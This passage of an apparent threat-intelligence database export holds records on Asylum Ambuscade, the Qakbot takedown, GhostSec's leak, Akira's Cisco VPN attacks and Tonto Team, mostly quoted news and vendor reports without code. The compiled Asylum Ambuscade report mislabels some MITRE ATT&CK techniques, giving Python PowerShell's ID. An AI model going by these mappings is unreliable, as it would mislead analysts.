additional Lua \ncode. \n\n \n \n\fFrom Dark Reading:  \n\n\"The compromise chains are almost identical in all campaigns,\" according to ESET's \nanalysis. \"In particular, SunSeed and AHKBOT have been widely used for both \ncybercrime and cyberespionage; [and] we dont believe that SunSeed and AHKBOT \nare [commodities used by multiple actors and] sold on the underground market.\" \n\nThus, the researchers determined that \"Asylum Ambuscade is a cybercrime group \nthat is doing some cyberespionage on the side [and] it appears to be branching out  \nagainst governments in Central Asia and Europe from time to time.\" \n\nIt's unclear if the group is a hack-for-hire outfit, a state-sponsored actor, or merely \nself-driven opportunists. \n\nFrom Proof Point: \n\nProofpoint has identified a likely nation-state sponsored phishing campaign using a \npossibly compromised Ukrainian armed service members email account to target \nEuropean government personnel involved in managing the logistics of refugees \nfleeing Ukraine. \n\nThe email included a malicious macro attachment which attempted to download a \nLua-based malware dubbed SunSeed. \n\nThe infection chain used in this campaign bears significant similarities to a historic \ncampaign Proofpoint observed in July 2021, making it likely the same threat actor is \nbehind both clusters of activity. \n\nProofpoint is releasing this report in an effort to balance accuracy with responsibility \nto disclose actionable intelligence during a time of high-tempo conflict.  \n\nOn February 24, 2022, Proofpoint detected an email originating from a ukr[.]net \nemail address which was sent to a European government entity. The email utilized the \nsubject \"IN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE \nSECURITY COUNCIL OF UKRAINE DATED 24.02.2022\" and included a macro enabled \nXLS file titled list of persons.xlsx, which was later determined to deliver SunSeed \nmalware. \n\nThis alert indicated that mass phishing campaigns were targeting Citizens e-mail \naddresses in Ukraine. \n\nThe Proofpoint-observed email messages were limited to European governmental \nentities. \n\n \n \n\fFrom Welivesecurity:  \n\nAsylum Ambuscade has been operating since at least 2020. \n\nIt is a crimeware group that targets bank customers and cryptocurrency traders in various \nregions, including North America and Europe. \n\nAsylum Ambuscade also does espionage against government entities in Europe and Central \nAsia. \n\nMost of the groups implants are developed in script languages such as AutoHotkey, \nJavaScript, Lua, Python, and VBS. \n\nThey were first publicly outed in March 2022 by Proofpoint researchers after the \ngroup targeted European government staff involved in helping Ukrainian refugees, \njust a few weeks after the start of the Russia-Ukraine war. \n\nWe assess that the goal of the attackers was to steal confidential information and \nwebmail credentials from official government webmail portals. \n\nThen, if the machine is deemed interesting, the attackers deploy the next stage: \nAHKBOT. This is a downloader written in AutoHotkey that can be extended with \nplugins, also written in AutoHotkey, in order to spy on the victims machine. An \nanalysis of the groups toolset is provided later in the blogpost. \nWhile the goal of targeting cryptocurrency traders is quite obvious  stealing \ncryptocurrency  we dont know for sure how Asylum Ambuscade monetizes its access \nto SMBs. It is possible the group sells the access to other crimeware groups who \nmight, for example, deploy ransomware. \n\nIn March 2023, it developed an AHKBOT equivalent in Node.js that we named \nNODEBOT. We believe those changes were intended to bypass detections from \nsecurity products. \n\nFrom SC Magazine: \n\nSeveral European nations surrounding Ukraine have mostly been the targets of \nAsylum Ambuscade's cyberespionage attacks, which involve the use of spearphishing \nemails with malicious attachments to facilitate the distribution of the AHKBOT \nmalware with password and file exfiltration, screenshot capturing, and keystroke \nmonitoring capabilities, according to an ESET report. \n\nMotivation: \nThe group is motivated by the following:  \n\n  Financial gain \n  Cyberespionage \n\n\fTarget(s):  \n\n  Government Agencies \n  Military \n  Cryptocurrency Trade \n  Financial Institutions \n\nOpportunity:  \n  Phishing Emails \n\nCapabilities (TTPs):  \n(Null) \n\nConsequences:  \nThe consequences resulted in either financial loss or the exfiltration of sensitive data.  \n\nIoCs (Behaviors): \nThe following ought to be considered indicators of compromise:  \n\n  A decrease in device performance. \n  New or unrecognized policy changes. \n \n\nLarge outputs of data that are not routine ought to be considered indicators of compromise.  \n\nResources:  \nThere is still debate as to whether this is a state-sponsored threat group or not. Regardless, their \nresources are sufficient to be considered a significant threat.  \n\nThreat Score: 2 \nOpportunity: 1 \nAsylum Ambuscade has limited attack vectors to infect a system.  \n\nConsequences: 3 \nGiven their target audience, the consequences can range from insignificant to catastrophic.  \n\nMitigation: 2 \nThe security measures taken by government agencies and financial institutions are sufficient as they \nstand to deal with Ambuscade.  \n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-05T15:10:58.346Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-05T15:14:25.048Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64f74a34ed13c104bf6d21c1"
  },
  "name": "Asylum Ambuscade",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Asylum Ambuscade Complete Report.pdf",
  "file_size": "342 KB",
  "content": "Asylum Ambuscade Complete Report \n\nThreat Group Overview:  \nAsylum Ambuscade is believed to have commenced its activities in 2020, and it was officially identified in \n2022. Despite the obscurity surrounding the group's origins, their primary targets have become \ndiscernible.  Distinctly focusing on the financial sectors, including crypto-traders, and government \nagencies. Notably, they have orchestrated a significant campaign directed towards organizations \nproviding assistance to refugees during the Russian-Ukraine war. \n\nSources: \nallinfosec \n\nSC Magazine \n\nDark Reading \n\nWelivesecurity \n\nProofPoint \n\nBleepingComputer \n\nIntent: \nFrom BleepingComputer: \n\nThe particular threat group, believed to have been operational since at least 2020, \nwas first identified by Proofpoint in a March 2022 report that focused on a phishing \ncampaign against entities aiding the Ukrainian refugees' movement. \n\nESET has counted 4,500 victims since it started tracking Asylum Ambuscade in \nJanuary 2022, equating to roughly 265 victims/month, making this a very prolific \nthreat actor and a severe threat to organizations worldwide. \n\nWhile the threat actors clearly target cryptocurrency traders and bank accounts for \nprofit, the compromise of SMB entities might point to cyberespionage. \n\nThe exploit initiates the download of an MSI installer that deploys the group's \nSunseed malware, a Lua-based downloader that also generates an LNK file in the \nWindows Startup folder for persistence. \n\nSunseed procures the subsequent-stage payload, Akhbot, from the command-and-\ncontrol server and continues to ping the server to receive and execute additional Lua \ncode. \n\n \n \n\fFrom Dark Reading:  \n\n\"The compromise chains are almost identical in all campaigns,\" according to ESET's \nanalysis. \"In particular, SunSeed and AHKBOT have been widely used for both \ncybercrime and cyberespionage; [and] we dont believe that SunSeed and AHKBOT \nare [commodities used by multiple actors and] sold on the underground market.\" \n\nThus, the researchers determined that \"Asylum Ambuscade is a cybercrime group \nthat is doing some cyberespionage on the side [and] it appears to be branching out  \nagainst governments in Central Asia and Europe from time to time.\" \n\nIt's unclear if the group is a hack-for-hire outfit, a state-sponsored actor, or merely \nself-driven opportunists. \n\nFrom Proof Point: \n\nProofpoint has identified a likely nation-state sponsored phishing campaign using a \npossibly compromised Ukrainian armed service members email account to target \nEuropean government personnel involved in managing the logistics of refugees \nfleeing Ukraine. \n\nThe email included a malicious macro attachment which attempted to download a \nLua-based malware dubbed SunSeed. \n\nThe infection chain used in this campaign bears significant similarities to a historic \ncampaign Proofpoint observed in July 2021, making it likely the same threat actor is \nbehind both clusters of activity. \n\nProofpoint is releasing this report in an effort to balance accuracy with responsibility \nto disclose actionable intelligence during a time of high-tempo conflict.  \n\nOn February 24, 2022, Proofpoint detected an email originating from a ukr[.]net \nemail address which was sent to a European government entity. The email utilized the \nsubject \"IN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE \nSECURITY COUNCIL OF UKRAINE DATED 24.02.2022\" and included a macro enabled \nXLS file titled list of persons.xlsx, which was later determined to deliver SunSeed \nmalware. \n\nThis alert indicated that mass phishing campaigns were targeting Citizens e-mail \naddresses in Ukraine. \n\nThe Proofpoint-observed email messages were limited to European governmental \nentities. \n\n \n \n\fFrom Welivesecurity:  \n\nAsylum Ambuscade has been operating since at least 2020. \n\nIt is a crimeware group that targets bank customers and cryptocurrency traders in various \nregions, including North America and Europe. \n\nAsylum Ambuscade also does espionage against government entities in Europe and Central \nAsia. \n\nMost of the groups implants are developed in script languages such as AutoHotkey, \nJavaScript, Lua, Python, and VBS. \n\nThey were first publicly outed in March 2022 by Proofpoint researchers after the \ngroup targeted European government staff involved in helping Ukrainian refugees, \njust a few weeks after the start of the Russia-Ukraine war. \n\nWe assess that the goal of the attackers was to steal confidential information and \nwebmail credentials from official government webmail portals. \n\nThen, if the machine is deemed interesting, the attackers deploy the next stage: \nAHKBOT. This is a downloader written in AutoHotkey that can be extended with \nplugins, also written in AutoHotkey, in order to spy on the victims machine. An \nanalysis of the groups toolset is provided later in the blogpost. \nWhile the goal of targeting cryptocurrency traders is quite obvious  stealing \ncryptocurrency  we dont know for sure how Asylum Ambuscade monetizes its access \nto SMBs. It is possible the group sells the access to other crimeware groups who \nmight, for example, deploy ransomware. \n\nIn March 2023, it developed an AHKBOT equivalent in Node.js that we named \nNODEBOT. We believe those changes were intended to bypass detections from \nsecurity products. \n\nFrom SC Magazine: \n\nSeveral European nations surrounding Ukraine have mostly been the targets of \nAsylum Ambuscade's cyberespionage attacks, which involve the use of spearphishing \nemails with malicious attachments to facilitate the distribution of the AHKBOT \nmalware with password and file exfiltration, screenshot capturing, and keystroke \nmonitoring capabilities, according to an ESET report. \n\nMotivation: \nThe group is motivated by the following:  \n\n  Financial gain \n  Cyberespionage \n\n\fTarget(s):  \n\n  Government Agencies \n  Military \n  Cryptocurrency Trade \n  Financial Institutions \n\nOpportunity:  \n  Phishing Emails \n\nCVE(s): \nCVE-2022-30190:  \nMicrosoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. \n\nCapabilities (TTPs):  \nInitial Access:  \nPhishing (T1566):  \nSpearphishing Attachment (T1566.001): \nMalicious File (T1204.002):  \nDrive-by Compromise (T1189): \nExploit Public-Facing Application (T1190): \nDiscovery: \nCredentials from Web Browsers (T1555.003): \nExecution:  \nUser Execution (T1204): \nPowerShell (T1059.001): \nCommand and Scripting Interpreter (T1059):  \nPython (T1059.001):  \nVisual Basic (T1059.005): \nJavaScript (T1059.007):  \nBoot or Logon Autostart Execution (T1547): \nMalware (T1587.001): \nPersistence:  \nRegistry Run Keys / Startup Folder (T1547.001):  \nDevelop Capabilities (T1587) \n\n \n\fDefense Evasion:  \nCommand Obfuscation (T1027.010): \nObfuscated Files or Information (T1027): \nCommand and Control:  \nVirtual Private Server (T1583.003): \n\nConsequences:  \nThe consequences resulted in either financial loss or the exfiltration of sensitive data.  \n\nIoCs (Behaviors): \nThe following ought to be considered indicators of compromise:  \n\n  A decrease in device performance. \n  New or unrecognized policy changes. \n \n\nLarge outputs of data that are not routine ought to be considered indicators of compromise.  \n\nResources:  \nThere is still debate as to whether this is a state-sponsored threat group or not. Regardless, their \nresources are sufficient to be considered a significant threat.  \n\nThreat Score: 2 \nOpportunity: 1 \nAsylum Ambuscade has limited attack vectors to infect a system.  \n\nConsequences: 3 \nGiven their target audience, the consequences can range from insignificant to catastrophic.  \n\nMitigation: 2 \nThe security measures taken by government agencies and financial institutions are sufficient as they \nstand to deal with Ambuscade.  \n\n \n \n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-05T15:33:08.685Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-05T15:35:19.149Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64f7919008eda25299b36a29"
  },
  "name": "Qakbot",
  "file_type": null,
  "website_url": "https://www.justice.gov/usao-cdca/pr/qakbot-malware-disrupted-international-cyber-takedown",
  "website_title": "Qakbot Malware Disrupted in International Cyber",
  "file_name": null,
  "file_size": null,
  "content": "Welcome to the new look of justice.gov. In the coming months you’ll see more pages in this new design. Please share your feedback with our webmaster. An official website of the United States government    LOS ANGELES – The Justice Department today announced a multinational operation involving actions in the United States, France, Germany, the Netherlands, the United Kingdom, Romania, and Latvia to disrupt the botnet and malware known as Qakbot and take down its infrastructure. The Qakbot malicious code is being deleted from victim computers, preventing it from doing any more harm. The Department also announced the seizure of more than $8.6 million in cryptocurrency in illicit profits. The action represents the largest U.S.-led financial and technical disruption of a botnet infrastructure leveraged by cybercriminals to commit ransomware, financial fraud, and other cyber-enabled criminal activity. “Cybercriminals who rely on malware like Qakbot to steal private data from innocent victims have been reminded today that they do not operate outside the bounds of the law,” said Attorney General Merrick B. Garland. “Together with our international partners, the Justice Department has hacked Qakbot’s infrastructure, launched an aggressive campaign to uninstall the malware from victim computers in the United States and around the world, and seized $8.6 million in extorted funds.” “An international partnership led by the Justice Department and the FBI has resulted in the dismantling of Qakbot, one of the most notorious botnets ever, responsible for massive losses to victims around the world,” said United States Attorney Martin Estrada. “Qakbot was the botnet of choice for some of the most infamous ransomware gangs, but we have now taken it out. This operation also has led to the seizure of almost 9 million dollars in cryptocurrency from the Qakbot cybercriminal organization, which will now be made available to victims. My Office’s focus is on protecting and vindicating the rights of victims, and this multifaceted attack on computer-enabled crime demonstrates our commitment to safeguarding our nation from harm.” “The Operation ‘Duck Hunt’ Team utilized their expertise in science and technology, but also relied on their ingenuity and passion to identify and cripple Qakbot, a highly structured and multi-layered bot network that was literally feeding the global cybercrime supply chain,” said Donald Alway, the Assistant Director in Charge of the FBI’s Los Angeles Field Office. “These actions will prevent an untold number of cyberattacks at all levels, from the compromised personal computer to a catastrophic attack on our critical infrastructure.\" According to court documents, Qakbot, also known by various other names, including “Qbot” and “Pinkslipbot,” is controlled by a cybercriminal organization and used to target critical industries worldwide. The Qakbot malware primarily infects victim computers through spam email messages containing malicious attachments or hyperlinks. Once it has infected a victim computer, Qakbot can deliver additional malware, including ransomware, to the infected computer. Qakbot has been used as an initial means of infection by many prolific ransomware groups in recent years, including Conti, ProLock, Egregor, REvil, MegaCortex, and Black Basta. The ransomware actors then extort their victims, seeking ransom payments in bitcoin before returning access to the victim computer networks.  These ransomware groups caused significant harm to businesses, healthcare providers, and government agencies all over the world, including to a power engineering firm based in Illinois; financial services organizations based in Alabama, Kansas, and Maryland; a defense manufacturer based in Maryland; and a food distribution company in Southern California. Investigators have found evidence that, between October 2021 and April 2023, Qakbot administrators received fees corresponding to approximately $58 million in ransoms paid by victims. The victim computers infected with Qakbot malware are part of a botnet (a network of compromised computers), meaning the perpetrators can remotely control all the infected computers in a coordinated manner. The owners and operators of the victim computers are typically unaware of the infection. As part of the takedown, the FBI was able to gain access to Qakbot infrastructure and identify over 700,000 computers worldwide, including more than 200,000 in the United States, that appear to have been infected with Qakbot. To disrupt the botnet, the FBI was able to redirect Qakbot botnet traffic to and through servers controlled by the FBI, which in turn instructed infected computers in the United States and elsewhere to download a file created by law enforcement that would uninstall the Qakbot malware. This uninstaller was designed to untether the victim computer from the Qakbot botnet, preventing further installation of malware through Qakbot. The scope of this law enforcement action was limited to information installed on the victim computers by the Qakbot actors. It did not extend to remediating other malware already installed on the victim computers and did not involve access to or modification of the information of the owners and users of the infected computers. Valuable technical assistance was provided by Zscaler. The FBI has partnered with the Cybersecurity and Infrastructure Security Agency, Shadowserver, Microsoft Digital Crimes Unit, the National Cyber Forensics and Training Alliance, and Have I Been Pwned to aid in victim notification and remediation. The FBI Los Angeles Field Office, the U.S. Attorney’s Office for the Central District of California, and the Criminal Division’s Computer Crime and Intellectual Property Section (CCIPS) conducted the operation in close cooperation with Eurojust. Investigators and prosecutors from several jurisdictions provided crucial assistance, including Europol, French Police Cybercrime Central Bureau and the Cybercrime Section of the Paris Prosecution Office, Germany’s Federal Criminal Police and General Public Prosecutor’s Office Frankfurt/Main, Netherlands National Police and National Public Prosecution Office, the United Kingdom’s National Crime Agency, Romania’s National Police, and Latvia’s State Police. The Justice Department’s Office of International Affairs and the FBI Milwaukee Field Office provided significant assistance. Assistant United States Attorneys Khaldoun Shobaki and Lauren Restrepo of the Cyber and Intellectual Property Crimes Section, along with CCIPS Trial Attorneys Jessica Peck, Ryan K.J. Dickey and Benjamin Proctor. Additional information and resources, including for victims, can be found on the following website, which will be updated as additional information and resources become available: https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources Thom Mrozek\nDirector of Media Relations\nthom.mrozek@usdoj.gov\n(213) 894-6947 A Downtown Los Angeles man pleaded guilty today to three felony charges, including that he defrauded victims, one of them a social media influencer, by engaging in “SIM swapping” to... As part of an ongoing initiative targeting computer attack “booter” services, the Justice Department today announced the court-authorized seizure of 13 internet domains associated with these DDoS-for-hire services. The seizures this... The Department of Justice announced today that it has seized virtual currency worth an estimated $112 million linked to cryptocurrency investment scams commonly called “pig butchering.” Central District of California\n312 North Spring Street\nSuite 1200\nLos Angeles, California 90012 Phone: 213-894-2400\nFax: 213-894-0141 Stay Connected  Have a question about Government Services?                                                                                          Central District of California\n312 North Spring Street\nSuite 1200\nLos Angeles, California 90012 Phone: 213-894-2400\nFax: 213-894-0141 Stay Connected     Archives Budget & Performance FOIA Accessibility Legal Policies & Disclaimers Privacy Policy For Employees Information Quality Office of the Inspector General No FEAR Act Data Small Business Vote.gov Español Contact USA.gov",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-05T20:37:36.644Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64f79a171725baed7a65c1d5"
  },
  "name": "GhostSec",
  "file_type": null,
  "website_url": "https://www.darkreading.com/dr-global/ghostsec-source-code-alleged-iranian-surveillance-tool",
  "website_title": "GhostSec Leaks Source Code of Alleged",
  "file_name": null,
  "file_size": null,
  "content": "Hacker group GhostSec is disclosing the source code of the various software packages, alleging them to be surveillance software used by Iran. The group claims to have the source code of the software from the Iranian FANAP group, and has analyzed around 26GB of compressed data which it is releasing a file at a time, according to a series of Telegram posts. GhostSec has so far released various components of the code, such as configuration files and API data. The FANAP group is an Iranian provider of technology to financial services and the IT sector, but has apparently expanded its wares into a comprehensive surveillance system used by the Iranian government to monitor its citizens, according to GhostSec — with features akin to the Pegasus spyware from the NSO group, or tools from Cellebrite. The first messages were posted on August 27, with GhostSec saying it had discovered facial recognition \"and various other privacy invading features and tools\" within the FANAP group's software. These were later disclosed as: In particular, GhostSec alleges that the software was deployed across all branches of Iran's Pasargad Bank, an investor in FANAP.  \"It is built on microservice architecture, and contains Kafka from Apache that is likely used for real-time processing of video data from multiple sources; Redis and Postgres to store metadata or analysis results; functions to interact with IP cameras; and services for system monitoring,\" according to the findings. Behnama in particular is not just a tool, but \"a powerful instrument of surveillance\" that is used by the Iranian government, law enforcement agencies, and military personnel, GhostSec said, noting that its intention of exposing FANAP is \"in the interests of the Iranian people, but also in the interests of protecting the privacy of each and every one of us.\" GhostSec's official statement regarding its motives for the breach and subsequent exposure is in line with its aims for human rights, it said. The group formed in the last decade as a hacktivist and online vigilante operation, and has participated in operations against ISIS and supported Ukraine in the conflict with Russia. In a message on Telegram, a GhostSec member said they were able to capture the source code by getting access to the FANAP infrastructure, then compromising a server with Ha-Proxy that had a metric page accessible. \"This page showed all the connections to the backend, and I tested them one by one until I came across one containing an open index: all the files were there,\" according tot he post. \"I then downloaded everything and studied the files for two months before I could really explain what it was.\" In a statement published by GhostSec, FANAP denied the reports about the leak, and said the claims were made \"without technical expertise and aimed at inciting public opinion.\" FANAP denied that the attack was successful, and said that only a part of the software logs and Docker files were made available. On the product's functionality, FANAP said the software \"only has the ability to recognize faces that have been introduced to the device with the person's presence and consent (similar to what is found in fingerprint registration in these devices).\" It also said that the use by the product to recognize the identity of citizens as a \"pure lie\" and said the facial recognition feature was \"designed for some needs within the organization and was not provided to organizations outside the FANAP group.\" In response, GhostSec said that it has discovered extensive components, making the code available for download once it understood the purpose of the Behnama software. Copyright © 2023 Informa PLC Informa UK Limited is a company registered in England and Wales with company number 1072954 whose registered office is 5 Howick Place, London, SW1P 1WG.  We and our partners use cookies to enhance your website experience, learn how our site is used, offer personalised features, measure the effectiveness of our services, and tailor content and ads to your interests while you navigate on the web or interact with us across devices. By clicking \"Continue\" or continuing to browse our site you are agreeing to our and our partners use of cookies. For more information seePrivacy Policy                     Behnama – Video surveillance using facial recognition Behyab – Car GPS and tracking system Behkhan – Car license plate recognition system Behcard - Facial recognition system for printing ID card       The Threat Hunter's Playbook: Mastering Cloud Defense Strategies Managing Security In a Hybrid Cloud Environment How Businesses Can Counterpunch against Generative AI-Powered Ransomware Preventing Attackers From Navigating Your Enterprise Systems Passwords Are Passe: Next Gen Authentication for Today's Threats How to Use Threat Intelligence to Mitigate Third-Party Risk Concerns Mount Over Ransomware, Zero-Day Bugs, and AI-Enabled Malware Everything You Need to Know About DNS Attacks Securing the Remote Worker: How to Mitigate Off-Site Cyberattacks How Enterprises Are Managing Application Security Risks in a Heightened Threat Environment The Forrester Wave: External Threat Intelligence Service Providers, Q3 2023 Mandiant Threat Intelligence at Penn State Health Crucial Considerations when Enabling Secure Industrial Digital Transformation The Ultimate Guide to the CISSP 2023 Global Future of Cyber Report Black Hat Europe - December 4-7 - Learn More Black Hat Middle East and Africa - Nov14-16 - Learn More SecTor - Canada's IT Security Conference Oct 23-26 - Learn More The Forrester Wave: External Threat Intelligence Service Providers, Q3 2023 Mandiant Threat Intelligence at Penn State Health The Threat Hunter's Playbook: Mastering Cloud Defense Strategies Managing Security In a Hybrid Cloud Environment How to Use Threat Intelligence to Mitigate Third-Party Risk Concerns Mount Over Ransomware, Zero-Day Bugs, and AI-Enabled Malware Interop InformationWeek Network Computing ITPro Today Data Center Knowledge Black Hat Omdia About Us Advertise Reprints       Home Cookies Privacy Terms",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-05T21:13:59.402Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64f8eaba962ce7e9153e4aea"
  },
  "name": "Akira ransomware gang",
  "file_type": null,
  "website_url": "https://www.bleepingcomputer.com/news/security/hacking-campaign-bruteforces-cisco-vpns-to-breach-networks/",
  "website_title": "Hacking campaign bruteforces Cisco VPNs to",
  "file_name": null,
  "file_size": null,
  "content": "Hackers are targeting Cisco Adaptive Security Appliance (ASA) SSL VPNs in credential stuffing and brute-force attacks that take advantage of lapses in security defenses, such as not enforcing multi-factor authentication (MFA). Last week, BleepingComputer reported that the Akira ransomware gang was breaching Cisco VPNs for initial network access. Rapid7 security researchers have provided additional insights regarding these incidents in a report published on Tuesday, revealing that attackers have been directing their efforts towards these devices since March of this year in brute force attacks designed to guess the targets' login credentials. They also said that they're yet to detect any instances where the threat actors behind these attacks have circumvented properly configured MFA to breach Cisco VPNs. This confirms an advisory from Cisco's Product Security Incident Response Team (PSIRT) published two days after BleepingComputer's report regarding attackers using automated tools to target Cisco VPNs in brute-force and password-spraying attacks. \"In the reported attack scenarios, the logging was not configured in the affected Cisco's ASAs. This has made it challenging to determine precisely how the Akira ransomware attackers were able to access the VPNs,\" Cisco PSIRT Principal Engineer Omar Santos said. \"If a threat actor successfully gains unauthorized access to a user's VPN credentials, such as through brute force attacks, MFA provides an additional layer of protection to prevent the threat actors from gaining access to the VPN.\" Rapid7 also revealed that at least 11 customers were breached in Cisco ASA-related attacks between March 30 and August 24, with the breaches linked to compromised SSL VPNs. In most incidents investigated by Rapid7, the malicious actors tried to log into ASA appliances using usernames spanning common ones, ranging from admin, guest, kali, and cisco to test, printer, security, and inspector. Rapid7 also said that most of the attacks utilized similar infrastructure, with the threat actors connecting from a Windows device named 'WIN-R84DEUE96RB' and using the 176.124.201[.]200 and 162.35.92[.]242 IP addresses. After breaching the VPN appliances, the attackers remotely accessed the victims' networks using the AnyDesk remote desktop software and compromised other systems using domain credentials stolen after dumping the NTDS.DIT Active Directory database. \"Several incidents our managed services teams have responded to ended in ransomware deployment by the Akira and LockBit groups,\" Rapid7 said. \"These incidents reinforce that use of weak or default credentials remains common, and that credentials in general are often not protected as a result of lax MFA enforcement in corporate networks.\" As BleepingComputer reported, a private SentinelOne WatchTower report suggests that Akira operators might be leveraging an undisclosed vulnerability within Cisco VPN software that could allow the attackers to bypass authentication on systems lacking multi-factor authentication (MFA) protection. While analyzing leaked data, SentinelOne threat analysts also uncovered evidence of Akira's exploitation of Cisco VPN gateways. Admins and security teams are advised to deactivate default accounts and passwords to block brute-force attempts targeting their VPN systems. Furthermore, they should ensure that MFA is enforced for all VPN users and that logging is enabled on all VPNs to help with attack analysis if needed. Akira ransomware targets Cisco VPNs to breach organizations Spain warns of LockBit Locker ransomware phishing attacks LockBit ransomware builder leaked online by \"angry developer\" The Week in Ransomware - August 18th 2023 - LockBit on Thin Ice The Week in Ransomware - August 4th 2023 - Targeting VMware ESXi Not a member yet? Register Now Okta: Hackers target IT help desks to gain Super Admin, disable MFA Insurer fined $3M for exposing data of 650k clients for two years Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure Copyright @ 2003 - 2023 Bleeping Computer® LLC - All Rights Reserved           NEWS           DOWNLOADS           VPNS      VIRUS REMOVAL GUIDES                TUTORIALS           DEALS      FORUMS MORE       Home News Security Hacking campaign bruteforces Cisco VPNs to breach networks    August 30, 2023 12:00 PM 0 AKIRA CISCO LOCKBIT RANSOMWARE VPN      PREVIOUS ARTICLE NEXT ARTICLE Okta: Hackers target IT help desks to gain Super Admin, disable MFA Insurer fined $3M for exposing data of 650k clients for two years      News VPN Buyer Guides Downloads Virus Removal Guides Tutorials Startup Database Uninstall Database Glossary Forums Forum Rules Chat Welcome Guide Sitemap About BleepingComputer Contact Us Send us a Tip! Advertising Write for BleepingComputer Social & Feeds Changelog",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-06T21:10:18.203Z"
  },
  "added_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_on": {
    "$date": "2023-09-06T22:04:38.460Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64fa0e8820fb3e090f7fb1d0"
  },
  "name": "China Tonta Team",
  "file_type": null,
  "website_url": "https://www.darkreading.com/threat-intelligence/china-tonto-team-apt-spy-operations-russia",
  "website_title": "Chinas Tonto Team APT Ramps Up",
  "file_name": null,
  "file_size": null,
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-07T17:55:20.450Z"
  },
  "added_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_on": {
    "$date": "2023-09-07T18:05:38.011Z"
  },
  "gcloud_request": null,
  "content": "Representing a significant increase in activity, a campaign linked to China started targeting Russia-linked organizations in June with malware designed to collect intelligence on government activities, according to analyses by security firms and Ukraine's Computer Emergency Response Team (CERT).  The attacks use purported government advisories sent as Rich Text Files (RTFs) in an attempt to convince victims to open the documents, thus allowing a remote code execution (RCE) exploit in Microsoft Office to be run. That's according to endpoint security firm SentinelOne, which stated in an analysis published on Thursday that the contents of the documents appear as security warnings written in Russian. They claim to warn agencies and infrastructure providers of potential attacks and advise them of compliance requirements under Russian law. While China has targeted Russia in the past, and vice versa, the pace of attacks — especially by the purported threat actor, Tonto Team — has grown following the Russian invasion of Ukraine, says Tom Hegel, a senior threat researcher at SentinelOne. \"Tonto Team, like other Chinese actors, has a long history of targeting Russia,\" he says. \"What we're seeing here is a potential Chinese government increase in intelligence collection requirements from inside Russia. Perhaps an increased prioritization or expansion of resources assigned to such tasking.\" The reported increase in Chinese cyber operations comes as Russia has strengthened diplomatic relations with China in the face of sanctions from Western nations. While the two major nations are not formal allies, they have expanded trade and defense ties over the past decade as a way to foil the expansion of Western alliances. In addition, they have different approaches to pursuing their foreign policy goals. Russia has tacitly allowed cybercriminal gangs to operate in its territory and has also widely used cyber operations to steal intelligence and attack infrastructure, as well as an adjunct to military operations. For example, Russia has used disinformation campaigns, infrastructure attacks, and espionage operations in its conflict with Ukraine. China, which has profited significantly from economic relations with Western nations, has mainly pursued non-military approaches to international relations and used cyber operations for acquiring intellectual property and conducting espionage. Treating Russia as any other adversary just shows consistency, says SentinelOne's Hegel. This is \"simply China looking out for itself in uncertain times,\" he says. \"Like any well-resourced nation, they seek to support their own agenda through cyber, and the state of affairs in Russia may be adjusting just what they prioritize.\" The recent campaigns have used two pieces of malware linked to Chinese advanced persistent threats (APTs): a toolkit used to build malicious documents known as Royal Road and a custom remote access Trojan (RAT) known as Bisonal used by Chinese actors. The Tonto Team — also known as Karma Panda and Bronze Huntley — traditionally has focused on other Asian nations, such as South Korea and Japan, as well as the United States and Taiwan. Recently, the group has increased its operations to Russia, Pakistan, and other nations. While false flag operations, where one adversary attempts to disguise their operations as another attacker, have happened, a variety of evidence links the attacks to China. At least seven threat groups — all linked to China — use Royal Road to create malicious documents as part of the initial attack aimed at gaining access to targeted systems. In April, for example, cyberthreat intelligence firm DomainTools analyzed an document created with the Royal Road malware building toolkit that had the hallmarks of a Chinese espionage campaign and targeted a Russian underwater research and weapons development organization. \"Combined with the sensitive targeting and the attempts at hardening the ultimate payload, it appears the adversary went to some effort to evade analysis of their activity as well,\" the analysis stated. \"Although this campaign appears specifically targeted to an entity in the Russian Federation, the underlying behaviors of this campaign — from malicious document usage through binary execution guardrails and controls — provide helpful insight into adversary tradecraft from which all defenders can learn valuable lessons.\" In addition, Bisonal is used exclusively by Chinese groups, according to the advisories. Companies should take note that nation-state attacks can often affect private businesses. The SentinelOne advisory has indicators of compromise (IoCs) for the latest campaigns, and DomainTools highlights various countermeasures for detecting and blunting cyber-espionage attacks. Organizations should use the intelligence to check their own defenses against similar attacks, says 